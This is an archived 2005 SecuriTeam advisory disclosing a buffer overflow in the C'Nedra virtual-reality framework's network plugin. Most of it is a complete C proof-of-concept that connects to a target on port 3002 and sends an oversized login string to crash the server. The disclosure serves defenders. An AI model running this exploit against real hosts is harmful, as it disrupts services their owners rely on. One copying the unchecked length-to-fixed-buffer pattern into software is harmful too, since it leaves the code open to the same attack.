[NEWS] C'Nedra Buffer Overflow

• Previous message: SecuriTeam: "[NT] Warrior Kings: Battles Fromat String"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 29 May 2005 18:44:32 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  C'Nedra Buffer Overflow
------------------------------------------------------------------------

SUMMARY

 <http://www.cnedra.org/> C'Nedra is "an open source virtual reality
framework for the creation of various worlds and applications".

A buffer overflow with C'Nedra allow attackers to remotely execute
arbitrary code.

DETAILS

Vulnerable Systems:
 * C'Nedra version 0.4.0 and prior

The network plugin is affected by a buffer-overflow in the function
READ_TCP_STRING() located in game_message_functions.cpp and used to read
the text strings received from the network. First it reads the 32 bit
number that specifies the size of the text string and then copies it into
a local buffer of only 100 bytes allowing an attacker to execute malicious
code.

Exploit:
/*

by Luigi Auriemma - http://aluigi.altervista.org/poc/cnedrabof.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif

#define VER "0.1"
#define PORT 3002
#define BUFFSZ 8192
#define MSG_LOGIN 120
#define BOF "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

u_int resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
    struct sockaddr_in peer;
    int sd,
            len;
    u_short port = PORT;
    u_char buff[BUFFSZ];
    struct {
        u_short msg_type;
        u_short msg_size;
        int msg_client;
        u_int msg_frame;
        u_short msg_param;
    } mh;

#ifdef WIN32
    WSADATA wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "C'Nedra <= 0.4.0 buffer-overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web: http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%d)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port = htons(port);
    peer.sin_family = AF_INET;

    printf("- target %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    *(u_int *)buff = htonl(sizeof(BOF) - 1);
    memcpy(buff + 4, BOF, sizeof(BOF) - 1);
    len = 4 + (sizeof(BOF) - 1);

    mh.msg_type = htons(MSG_LOGIN);
    mh.msg_size = htons(len);
    mh.msg_client = htonl(0);
    mh.msg_frame = htonl(0);
    mh.msg_param = htons(0);

    send(sd, (void *)&mh, sizeof(mh), 0); // username
    send(sd, buff, len, 0);

    close(sd);
    fputs("- check the server manually to see if it is crashed\n",
stdout);
    return(0);
}

u_int resolv(char *host) {
    struct hostent *hp;
    u_int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)(hp->h_addr);
    }
    return(host_ip);
}

#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

/* EOF */

ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
You can obtain a copy of winerr.h at:
<http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html>
http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] Warrior Kings: Battles Fromat String"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]